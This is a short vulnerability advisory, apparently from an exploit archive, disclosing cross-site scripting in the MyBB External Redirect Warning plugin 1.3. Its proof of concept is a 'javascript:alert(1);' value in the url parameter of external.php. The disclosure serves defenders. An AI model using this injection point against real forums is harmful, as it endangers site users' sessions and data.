# Exploit Title: MyBB External Redirect Warning Plugin 1.3 – Cross-Site Scripting
# Date: February 1, 2021
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=493
# Version: 1.3
# Tested On: Windows 10
# CVE: CVE-2022-28353

Description:
This plugin notifies the user when they are being redirect to an off-site page. The redirect URL is vulnerable to XSS.

Proof of Concept:

– Go to the following URL… external.php?url=javascript:alert(1);
– Click continue
Payload will execute